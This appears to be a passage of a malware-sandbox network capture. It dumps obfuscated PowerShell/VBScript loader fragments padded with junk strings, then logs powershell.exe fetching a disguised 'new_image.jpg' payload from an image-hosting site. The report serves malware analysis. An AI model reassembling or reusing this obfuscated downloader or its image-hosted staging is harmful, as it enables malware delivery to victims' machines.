2024-04-20 09:36:00 UTC	1369	IN	Data Raw: 44 67 54 72 65 4c 51 42 53 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 Data Ascii: DgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & taquidrito & imutar & taquidrito & "gBvDgTreHIDgTre" & taquidr
2024-04-20 09:36:00 UTC	1369	IN	Data Raw: 72 65 49 44 67 54 72 65 42 44 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 Data Ascii: reIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & taquidrito & imutar & taquidrito & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & taquidrito & imutar & taquidrito & "QBuDgTreHMDgTreLgBjDgTreG8
2024-04-20 09:36:00 UTC	1369	IN	Data Raw: 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 77 44 67 54 72 65 2f 44 67 54 72 65 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 4d 44 67 54 72 65 4d 77 44 67 54 72 65 35 44 67 54 72 65 44 51 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 79 44 67 54 72 65 44 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 51 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 Data Ascii: imutar & taquidrito & "wDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & taquidrito & imutar & taquidrito & "QBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgT
2024-04-20 09:36:00 UTC	1369	IN	Data Raw: 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 38 44 67 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 52 67 42 73 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 Data Ascii: cDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre" & taquidrito & imutar & taquidrito & "QBuDgTreGQDgTreRgBsDgTreGEDgTre" & taquidrito & imuta
2024-04-20 09:36:00 UTC	1095	IN	Data Raw: 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 Data Ascii: & taquidrito & imutar & taquidrito & "QB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTre" & taquidrito & imutar & taquidrito & "DgTreDgTregDgTreCQDgTre" & taquidrito & imutar & taquidrito & "QBuDgTreGQDgTreSQBuDgTreGQDgTre" &
2024-04-20 09:36:00 UTC	1369	IN	Data Raw: 31 34 32 65 0d 0a 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 51 42 34 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 45 4d 44 67 54 72 65 62 77 42 74 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 49 44 67 54 72 65 44 Data Ascii: 142eeBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & taquidrito & imutar & taquidrito & "QB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreD
2024-04-20 09:36:00 UTC	1369	IN	Data Raw: 47 55 44 67 54 72 65 62 51 42 69 44 67 54 72 65 47 77 44 67 54 72 65 65 51 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 62 44 67 54 72 65 46 4d 44 67 54 72 65 65 51 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 51 42 74 44 67 54 72 65 43 34 44 67 54 72 65 55 67 42 6c 44 67 54 72 65 47 59 44 67 54 72 65 62 44 67 54 72 65 42 6c 44 67 54 72 65 47 4d 44 67 54 72 65 64 44 67 54 72 65 42 70 44 67 54 72 65 47 38 44 67 54 72 65 62 67 44 67 54 72 65 75 44 67 54 72 65 45 45 44 67 54 72 65 63 77 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 62 51 42 69 44 67 54 72 65 47 77 44 67 54 72 65 65 51 42 64 44 67 54 72 65 44 6f 44 67 Data Ascii: GUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTre" & taquidrito & imutar & taquidrito & "QBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDg
2024-04-20 09:36:00 UTC	1369	IN	Data Raw: 54 72 65 4d 77 44 67 54 72 65 79 44 67 54 72 65 43 38 44 67 54 72 65 4c 77 44 67 54 72 65 36 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 64 44 67 54 72 65 42 30 44 67 54 72 65 47 67 44 67 54 72 65 4a 77 44 67 54 72 65 67 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 44 45 44 67 54 72 65 4a 77 44 67 54 72 65 67 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 45 4d 44 67 54 72 65 4f 67 42 63 44 67 54 72 65 46 44 67 54 72 65 44 67 54 72 65 63 67 42 76 44 67 54 72 65 47 63 44 67 54 72 65 63 67 42 68 44 67 54 72 65 47 30 44 67 54 72 65 52 44 67 54 72 65 42 68 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 63 44 67 54 72 65 43 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 73 Data Ascii: TreMwDgTreyDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTres

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49163	172.67.215.45	443	3272	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 09:36:03 UTC	124	OUT	GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-04-20 09:36:03 UTC	699	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 09:36:03 GMT Content-Type: image/jpeg Content-Length: 4201093 Connection: close Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT ETag: "66205484-401a85" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 5253 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D4jEbO6vxxaT%2BC%2BMl%2BHysV2pVFi6Z71yqbzlDkX7lqvvRDcwYeDlBGVG%2BrGy5CyNF8K3f47Xj4HeYUv2aLdX%2FRATa8UAAgP3MP0fqKu9nQuLyPZc0y8v7BIHxBabLj9Ivr16W0GbDRmg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 877425d6b90e6785-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 09:36:03 UTC	670	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-20 09:36:03 UTC	1369	IN	Data Raw: c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-20 09:36:03 UTC	1369	IN	Data Raw: c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$
2024-04-20 09:36:03 UTC	1369	IN	Data Raw: 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-04-20 09:36:03 UTC	1369	IN	Data Raw: 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e Data Ascii: >2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^
2024-04-20 09:36:03 UTC	1369	IN	Data Raw: cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 Data Ascii: 4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
2024-04-20 09:36:03 UTC	1369	IN	Data Raw: 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 Data Ascii: r:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
2024-04-20 09:36:03 UTC	1369	IN	Data Raw: dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
2024-04-20 09:36:03 UTC	1369	IN	Data Raw: 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce Data Ascii: lW_4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@
2024-04-20 09:36:03 UTC	1369	IN	Data Raw: f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49164	172.67.215.45	443	3272	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 09:36:05 UTC	100	OUT	GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1 Host: uploaddeimagens.com.br
2024-04-20 09:36:05 UTC	701	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 09:36:05 GMT Content-Type: image/jpeg Content-Length: 4201093 Connection: close Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT ETag: "66205484-401a85" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 5255 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RTJQX0Mf%2B%2Bo%2FZG5d13MsHzJJ%2BCUJE5jrx2axgZQau3rRshI3idxbYmoy3W%2FamzRK4CXZEmlZhr2jCzeXeuVqiLoIYEzUQPcUuy26KZNIAcy3UYh7EaDBeKKi2%2F2OwX70xAZ4P6fF4HnA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 877425e329e5b039-ATL alt-svc: h3=":443"; ma=86400
